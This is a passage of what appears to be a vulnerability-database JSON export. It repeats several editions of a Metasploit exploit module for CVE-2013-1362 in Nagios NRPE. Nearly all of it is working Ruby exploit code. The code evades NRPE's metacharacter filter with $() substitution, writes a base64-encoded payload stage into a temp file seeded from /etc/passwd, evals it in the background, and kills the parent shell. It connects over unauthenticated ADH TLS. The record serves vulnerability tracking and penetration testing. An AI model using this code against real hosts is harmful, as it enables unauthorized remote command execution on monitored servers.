SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-09T15:39:13", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-17T23:39:31", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-17T23:39:31", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-18T01:38:05", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-18T01:38:05", "differentElements": ["modified", "published"], "edition": 15}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-20T01:37:52", "history": [], "viewCount": 16, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2017-11-20T01:37:52", "differentElements": ["modified", "published"], "edition": 16}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2017-11-20T05:38:35", "history": [], "viewCount": 17, "enchantments": {"score": {"value": 6.0, "modified": "2017-11-20T05:38:35"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = 